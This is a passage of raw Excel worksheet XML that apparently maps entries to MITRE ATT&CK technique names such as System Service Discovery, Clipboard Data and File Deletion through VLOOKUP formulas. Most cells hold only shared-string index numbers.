      <c r="L53" s="5" t="s">
        <v>818</v>
      </c>
    </row>
    <row r="54" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A54" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B54" s="30" t="s">
        <v>819</v>
      </c>
      <c r="C54" s="25" t="s">
        <v>824</v>
      </c>
      <c r="D54" s="7" t="s">
        <v>573</v>
      </c>
      <c r="E54" s="9" t="str">
        <f>VLOOKUP(D54,Sheet2!A:B,2,0)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="F54" s="6" t="s">
        <v>820</v>
      </c>
      <c r="G54" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H54" s="6" t="s">
        <v>809</v>
      </c>
      <c r="I54" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J54" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K54" s="9" t="s">
        <v>712</v>
      </c>
      <c r="L54" s="5" t="s">
        <v>819</v>
      </c>
    </row>
    <row r="55" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A55" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B55" s="30" t="s">
        <v>821</v>
      </c>
      <c r="C55" s="25" t="s">
        <v>825</v>
      </c>
      <c r="D55" s="7" t="s">
        <v>389</v>
      </c>
      <c r="E55" s="9" t="str">
        <f>VLOOKUP(D55,Sheet2!A:B,2,0)</f>
        <v>New Service</v>
      </c>
      <c r="F55" s="6" t="s">
        <v>878</v>
      </c>
      <c r="G55" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H55" s="6" t="s">
        <v>809</v>
      </c>
      <c r="I55" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J55" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K55" s="9" t="s">
        <v>713</v>
      </c>
      <c r="L55" s="5" t="s">
        <v>821</v>
      </c>
    </row>
    <row r="56" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A56" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B56" s="30" t="s">
        <v>822</v>
      </c>
      <c r="C56" s="25" t="s">
        <v>824</v>
      </c>
      <c r="D56" s="7" t="s">
        <v>573</v>
      </c>
      <c r="E56" s="9" t="str">
        <f>VLOOKUP(D56,Sheet2!A:B,2,0)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="F56" s="6" t="s">
        <v>876</v>
      </c>
      <c r="G56" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H56" s="6" t="s">
        <v>809</v>
      </c>
      <c r="I56" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J56" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K56" s="9" t="s">
        <v>714</v>
      </c>
      <c r="L56" s="5" t="s">
        <v>822</v>
      </c>
    </row>
    <row r="57" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A57" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B57" s="30" t="s">
        <v>826</v>
      </c>
      <c r="C57" s="25" t="s">
        <v>824</v>
      </c>
      <c r="D57" s="7" t="s">
        <v>253</v>
      </c>
      <c r="E57" s="9" t="str">
        <f>VLOOKUP(D57,Sheet2!A:B,2,0)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="F57" s="6" t="s">
        <v>877</v>
      </c>
      <c r="G57" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H57" s="6" t="s">
        <v>809</v>
      </c>
      <c r="I57" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J57" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K57" s="9" t="s">
        <v>715</v>
      </c>
      <c r="L57" s="5" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="58" spans="1:12" ht="56" x14ac:dyDescent="0.2">
      <c r="A58" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B58" s="30" t="s">
        <v>827</v>
      </c>
      <c r="C58" s="25" t="s">
        <v>823</v>
      </c>
      <c r="D58" s="7" t="s">
        <v>33</v>
      </c>
      <c r="E58" s="9" t="str">
        <f>VLOOKUP(D58,Sheet2!A:B,2,0)</f>
        <v>Service Execution</v>
      </c>
      <c r="F58" s="7" t="s">
        <v>875</v>
      </c>
      <c r="G58" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H58" s="7" t="s">
        <v>809</v>
      </c>
      <c r="I58" s="7" t="s">
        <v>812</v>
      </c>
      <c r="J58" s="7" t="s">
        <v>809</v>
      </c>
      <c r="K58" s="9" t="s">
        <v>716</v>
      </c>
      <c r="L58" s="5" t="s">
        <v>827</v>
      </c>
    </row>
    <row r="59" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A59" s="27"/>
      <c r="B59" s="28" t="s">
        <v>832</v>
      </c>
      <c r="C59" s="25" t="s">
        <v>828</v>
      </c>
      <c r="D59" s="7" t="s">
        <v>573</v>
      </c>
      <c r="E59" s="9" t="str">
        <f>VLOOKUP(D59,Sheet2!A:B,2,0)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="F59" s="10" t="s">
        <v>747</v>
      </c>
      <c r="G59" s="10" t="s">
        <v>812</v>
      </c>
      <c r="H59" s="10" t="s">
        <v>833</v>
      </c>
      <c r="I59" s="10" t="s">
        <v>812</v>
      </c>
      <c r="J59" s="10" t="s">
        <v>833</v>
      </c>
      <c r="K59" s="9" t="s">
        <v>717</v>
      </c>
      <c r="L59" s="5" t="s">
        <v>832</v>
      </c>
    </row>
    <row r="60" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A60" s="27"/>
      <c r="B60" s="28" t="s">
        <v>834</v>
      </c>
      <c r="C60" s="25" t="s">
        <v>829</v>
      </c>
      <c r="D60" s="7" t="s">
        <v>259</v>
      </c>
      <c r="E60" s="9" t="str">
        <f>VLOOKUP(D60,Sheet2!A:B,2,0)</f>
        <v>File Permissions Modification</v>
      </c>
      <c r="F60" s="6" t="s">
        <v>836</v>
      </c>
      <c r="G60" s="6" t="s">
        <v>812</v>
      </c>
      <c r="H60" s="6" t="s">
        <v>833</v>
      </c>
      <c r="I60" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J60" s="6" t="s">
        <v>833</v>
      </c>
      <c r="K60" s="9" t="s">
        <v>718</v>
      </c>
      <c r="L60" s="5" t="s">
        <v>834</v>
      </c>
    </row>
    <row r="61" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A61" s="27"/>
      <c r="B61" s="28" t="s">
        <v>835</v>
      </c>
      <c r="C61" s="25" t="s">
        <v>829</v>
      </c>
      <c r="D61" s="7" t="s">
        <v>259</v>
      </c>
      <c r="E61" s="9" t="str">
        <f>VLOOKUP(D61,Sheet2!A:B,2,0)</f>
        <v>File Permissions Modification</v>
      </c>
      <c r="F61" s="6" t="s">
        <v>748</v>
      </c>
      <c r="G61" s="10" t="s">
        <v>812</v>
      </c>
      <c r="H61" s="6" t="s">
        <v>833</v>
      </c>
      <c r="I61" s="10" t="s">
        <v>812</v>
      </c>
      <c r="J61" s="6" t="s">
        <v>833</v>
      </c>
      <c r="K61" s="9" t="s">
        <v>719</v>
      </c>
      <c r="L61" s="5" t="s">
        <v>835</v>
      </c>
    </row>
    <row r="62" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A62" s="27"/>
      <c r="B62" s="28" t="s">
        <v>837</v>
      </c>
      <c r="C62" s="25" t="s">
        <v>28</v>
      </c>
      <c r="D62" s="7" t="s">
        <v>29</v>
      </c>
      <c r="E62" s="9" t="str">
        <f>VLOOKUP(D62,Sheet2!A:B,2,0)</f>
        <v>Accessibility Features</v>
      </c>
      <c r="F62" s="6" t="s">
        <v>749</v>
      </c>
      <c r="G62" s="6" t="s">
        <v>812</v>
      </c>
      <c r="H62" s="6" t="s">
        <v>833</v>
      </c>
      <c r="I62" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J62" s="6" t="s">
        <v>833</v>
      </c>
      <c r="K62" s="9" t="s">
        <v>720</v>
      </c>
      <c r="L62" s="5" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="63" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A63" s="35"/>
      <c r="B63" s="36" t="s">
        <v>838</v>
      </c>
      <c r="C63" s="25" t="s">
        <v>830</v>
      </c>
      <c r="D63" s="7" t="s">
        <v>253</v>
      </c>
      <c r="E63" s="9" t="str">
        <f>VLOOKUP(D63,Sheet2!A:B,2,0)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="F63" s="6" t="s">
        <v>750</v>
      </c>
      <c r="G63" s="6" t="s">
        <v>812</v>
      </c>
      <c r="H63" s="6" t="s">
        <v>833</v>
      </c>
      <c r="I63" s="6" t="s">
        <v>800</v>
      </c>
      <c r="J63" s="6" t="s">
        <v>833</v>
      </c>
      <c r="K63" s="9" t="s">
        <v>722</v>
      </c>
      <c r="L63" s="5" t="s">
        <v>838</v>
      </c>
    </row>
    <row r="64" spans="1:12" ht="98" x14ac:dyDescent="0.2">
      <c r="A64" s="35"/>
      <c r="B64" s="36" t="s">
        <v>840</v>
      </c>
      <c r="C64" s="25" t="s">
        <v>721</v>
      </c>
      <c r="D64" s="7" t="s">
        <v>173</v>
      </c>
      <c r="E64" s="9" t="str">
        <f>VLOOKUP(D64,Sheet2!A:B,2,0)</f>
        <v>Data Staged</v>
      </c>
      <c r="F64" s="6" t="s">
        <v>752</v>
      </c>
      <c r="G64" s="6" t="s">
        <v>812</v>
      </c>
      <c r="H64" s="6" t="s">
        <v>833</v>
      </c>
      <c r="I64" s="6" t="s">
        <v>839</v>
      </c>
      <c r="J64" s="6" t="s">
        <v>833</v>
      </c>
      <c r="K64" s="9" t="s">
        <v>751</v>
      </c>
      <c r="L64" s="5" t="s">
        <v>840</v>
      </c>
    </row>
    <row r="65" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A65" s="37"/>
      <c r="B65" s="38" t="s">
        <v>841</v>
      </c>
      <c r="C65" s="25" t="s">
        <v>723</v>
      </c>
      <c r="D65" s="12" t="s">
        <v>102</v>
      </c>
      <c r="E65" s="9" t="str">
        <f>VLOOKUP(D65,Sheet2!A:B,2,0)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="F65" s="9" t="s">
        <v>753</v>
      </c>
      <c r="G65" s="9" t="s">
        <v>762</v>
      </c>
      <c r="H65" s="9" t="s">
        <v>806</v>
      </c>
      <c r="I65" s="9" t="s">
        <v>762</v>
      </c>
      <c r="J65" s="9" t="s">
        <v>806</v>
      </c>
      <c r="K65" s="8" t="s">
        <v>724</v>
      </c>
      <c r="L65" s="5" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="66" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A66" s="37"/>
      <c r="B66" s="38" t="s">
        <v>842</v>
      </c>
      <c r="C66" s="25" t="s">
        <v>723</v>
      </c>
      <c r="D66" s="12" t="s">
        <v>149</v>
      </c>
      <c r="E66" s="9" t="str">
        <f>VLOOKUP(D66,Sheet2!A:B,2,0)</f>
        <v>Data Compressed</v>
      </c>
      <c r="F66" s="9" t="s">
        <v>755</v>
      </c>
      <c r="G66" s="9" t="s">
        <v>762</v>
      </c>
      <c r="H66" s="9" t="s">
        <v>806</v>
      </c>
      <c r="I66" s="9" t="s">
        <v>762</v>
      </c>
      <c r="J66" s="9" t="s">
        <v>806</v>
      </c>
      <c r="K66" s="8" t="s">
        <v>725</v>
      </c>
      <c r="L66" s="5" t="s">
        <v>842</v>
      </c>
    </row>
    <row r="67" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A67" s="37"/>
      <c r="B67" s="38" t="s">
        <v>843</v>
      </c>
      <c r="C67" s="25" t="s">
        <v>723</v>
      </c>
      <c r="D67" s="12" t="s">
        <v>215</v>
      </c>
      <c r="E67" s="9" t="str">
        <f>VLOOKUP(D67,Sheet2!A:B,2,0)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="F67" s="9" t="s">
        <v>754</v>
      </c>
      <c r="G67" s="9" t="s">
        <v>762</v>
      </c>
      <c r="H67" s="9" t="s">
        <v>806</v>
      </c>
      <c r="I67" s="9" t="s">
        <v>762</v>
      </c>
      <c r="J67" s="9" t="s">
        <v>806</v>
      </c>
      <c r="K67" s="8" t="s">
        <v>726</v>
      </c>
      <c r="L67" s="5" t="s">
        <v>843</v>
      </c>
    </row>
    <row r="68" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A68" s="37"/>
      <c r="B68" s="38" t="s">
        <v>844</v>
      </c>
      <c r="C68" s="25" t="s">
        <v>723</v>
      </c>
      <c r="D68" s="12" t="s">
        <v>256</v>
      </c>
      <c r="E68" s="9" t="str">
        <f>VLOOKUP(D68,Sheet2!A:B,2,0)</f>
        <v>File Deletion</v>
      </c>
      <c r="F68" s="9" t="s">
        <v>756</v>
      </c>
      <c r="G68" s="9" t="s">
        <v>762</v>
      </c>
      <c r="H68" s="9" t="s">
        <v>806</v>
      </c>
      <c r="I68" s="9" t="s">
        <v>762</v>
      </c>
      <c r="J68" s="9" t="s">
        <v>806</v>
      </c>
      <c r="K68" s="8" t="s">
        <v>727</v>
      </c>
      <c r="L68" s="5" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="69" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A69" s="37"/>
      <c r="B69" s="38" t="s">
        <v>845</v>
      </c>
      <c r="C69" s="25" t="s">
        <v>723</v>
      </c>
      <c r="D69" s="12" t="s">
        <v>256</v>
      </c>
      <c r="E69" s="9" t="str">
        <f>VLOOKUP(D69,Sheet2!A:B,2,0)</f>
        <v>File Deletion</v>
      </c>
      <c r="F69" s="9" t="s">
        <v>757</v>
      </c>
      <c r="G69" s="9" t="s">
        <v>762</v>
      </c>
      <c r="H69" s="9" t="s">
        <v>806</v>
      </c>
      <c r="I69" s="9" t="s">
        <v>762</v>
      </c>
      <c r="J69" s="9" t="s">
        <v>806</v>
      </c>
      <c r="K69" s="8" t="s">
        <v>728</v>
      </c>
      <c r="L69" s="5" t="s">
        <v>845</v>
      </c>
    </row>
    <row r="70" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A70" s="39"/>
      <c r="B70" s="40" t="s">
        <v>846</v>
      </c>
      <c r="C70" s="25" t="s">
        <v>831</v>
      </c>
      <c r="D70" s="7" t="s">
        <v>29</v>
      </c>
      <c r="E70" s="9" t="str">
        <f>VLOOKUP(D70,Sheet2!A:B,2,0)</f>
        <v>Accessibility Features</v>
      </c>
      <c r="F70" s="9" t="s">
        <v>758</v>
      </c>
      <c r="G70" s="9"/>
      <c r="H70" s="9"/>
      <c r="I70" s="9" t="s">
        <v>812</v>
      </c>
      <c r="J70" s="9" t="s">
        <v>809</v>
      </c>
      <c r="K70" s="8" t="s">
        <v>729</v>
      </c>
      <c r="L70" s="5" t="s">
        <v>846</v>
      </c>
    </row>
    <row r="71" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A71" s="39"/>
      <c r="B71" s="40" t="s">
        <v>847</v>
      </c>
      <c r="C71" s="25" t="s">
        <v>828</v>
      </c>
      <c r="D71" s="12" t="s">
        <v>5</v>
      </c>
      <c r="E71" s="9" t="str">
        <f>VLOOKUP(D71,Sheet2!A:B,2,0)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="F71" s="9" t="s">
        <v>759</v>
      </c>
      <c r="G71" s="9"/>
      <c r="H71" s="9"/>
      <c r="I71" s="9" t="s">
        <v>812</v>
      </c>
      <c r="J71" s="9" t="s">
        <v>809</v>
      </c>
      <c r="K71" s="8" t="s">
        <v>730</v>
      </c>
      <c r="L71" s="5" t="s">
        <v>847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9F6F9-8D56-D444-AFE4-6B2A37498634}">
  <dimension ref="A1:C224"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F14" sqref="F14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>34</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>35</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="s">
        <v>37</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>38</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>635</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>24</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>39</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>636</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="2" t="s">
        <v>29</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>40</v>
      </c>
      <c r="C4" s="4" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="2" t="s">
        <v>11</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>42</v>
      </c>
      <c r="C5" s="4" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="2" t="s">
        <v>44</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>45</v>
      </c>
      <c r="C6" s="4" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="2" t="s">
        <v>47</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>48</v>
      </c>
      <c r="C7" s="4" t="s">
        <v>637</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="2" t="s">
        <v>49</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>50</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="2" t="s">
        <v>52</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>53</v>
      </c>
      <c r="C9" s="4" t="s">
        <v>638</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="2" t="s">
        <v>54</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>55</v>
      </c>
      <c r="C10" s="4" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="2" t="s">
        <v>57</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>58</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="2" t="s">
        <v>60</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>61</v>
      </c>
      <c r="C12" s="4" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="2" t="s">
        <v>63</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>64</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="2" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>67</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>70</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A16" s="2" t="s">
        <v>72</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>73</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A17" s="2" t="s">
        <v>75</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>76</v>
      </c>
      <c r="C17" s="4" t="s">
        <v>639</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A18" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>78</v>
      </c>
      <c r="C18" s="4" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A19" s="2" t="s">
        <v>80</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>81</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A20" s="2" t="s">
        <v>83</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>84</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A21" s="2" t="s">
        <v>86</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>87</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A22" s="2" t="s">
        <v>89</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>90</v>
      </c>
      <c r="C22" s="4" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A23" s="2" t="s">
        <v>92</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>93</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A24" s="2" t="s">
        <v>22</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>95</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A25" s="2" t="s">
        <v>97</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>98</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A26" s="2" t="s">
        <v>100</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>101</v>
      </c>
      <c r="C26" s="4" t="s">
        <v>640</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A27" s="2" t="s">
        <v>102</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>103</v>
      </c>
      <c r="C27" s="4" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A28" s="2" t="s">
        <v>105</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>106</v>
      </c>
      <c r="C28" s="4" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A29" s="2" t="s">
        <v>108</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>109</v>
      </c>
      <c r="C29" s="4" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A30" s="2" t="s">
        <v>111</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>112</v>
      </c>
      <c r="C30" s="4" t="s">
        <v>641</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A31" s="2" t="s">
        <v>113</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>114</v>
      </c>
      <c r="C31" s="4" t="s">
        <v>115</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A32" s="2" t="s">
        <v>116</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>117</v>
      </c>
      <c r="C32" s="2" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A33" s="2" t="s">
        <v>119</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>120</v>
      </c>
      <c r="C33" s="4" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A34" s="2" t="s">
        <v>122</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>123</v>
      </c>
      <c r="C34" s="2" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A35" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>126</v>
      </c>
      <c r="C35" s="4" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A36" s="2" t="s">
        <v>128</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>129</v>
      </c>
      <c r="C36" s="2" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A37" s="2" t="s">
        <v>131</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>132</v>
      </c>
      <c r="C37" s="4" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A38" s="2" t="s">
        <v>31</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>134</v>
      </c>
      <c r="C38" s="4" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A39" s="2" t="s">
        <v>25</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>136</v>
      </c>
      <c r="C39" s="4" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A40" s="2" t="s">
        <v>26</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>138</v>
      </c>
      <c r="C40" s="4" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A41" s="2" t="s">
        <v>140</v>
      </c>
      <c r="B41" s="2" t="s">
        <v>141</v>
      </c>
      <c r="C41" s="4" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A42" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B42" s="2" t="s">
        <v>144</v>
      </c>
      <c r="C42" s="2" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A43" s="2" t="s">
        <v>146</v>
      </c>
      <c r="B43" s="2" t="s">
        <v>147</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A44" s="2" t="s">
        <v>149</v>
      </c>
      <c r="B44" s="2" t="s">
        <v>150</v>
      </c>
      <c r="C44" s="4" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A45" s="2" t="s">
        <v>152</v>
      </c>
      <c r="B45" s="2" t="s">
        <v>153</v>
      </c>
      <c r="C45" s="4" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A46" s="2" t="s">
        <v>155</v>
      </c>
      <c r="B46" s="2" t="s">
        <v>156</v>
      </c>
      <c r="C46" s="4" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="47" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A47" s="2" t="s">
        <v>158</v>
      </c>
      <c r="B47" s="2" t="s">
        <v>159</v>
      </c>
      <c r="C47" s="4" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="48" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A48" s="2" t="s">
        <v>161</v>
      </c>
      <c r="B48" s="2" t="s">
        <v>162</v>
      </c>
      <c r="C48" s="4" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="49" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A49" s="2" t="s">
        <v>164</v>
      </c>
      <c r="B49" s="2" t="s">
        <v>165</v>
      </c>
      <c r="C49" s="4" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="50" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A50" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B50" s="2" t="s">
        <v>168</v>
      </c>
      <c r="C50" s="4" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="51" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A51" s="2" t="s">
        <v>170</v>
      </c>
      <c r="B51" s="2" t="s">
        <v>171</v>
      </c>
      <c r="C51" s="4" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="52" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A52" s="2" t="s">
        <v>173</v>
      </c>
      <c r="B52" s="2" t="s">
        <v>174</v>
      </c>
      <c r="C52" s="4" t="s">
        <v>642</v>
      </c>
    </row>
    <row r="53" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A53" s="2" t="s">
        <v>175</v>
      </c>
      <c r="B53" s="2" t="s">
        <v>176</v>
      </c>
      <c r="C53" s="4" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="54" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A54" s="2" t="s">
        <v>178</v>
      </c>
      <c r="B54" s="2" t="s">
        <v>179</v>
      </c>
      <c r="C54" s="4" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="55" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A55" s="2" t="s">
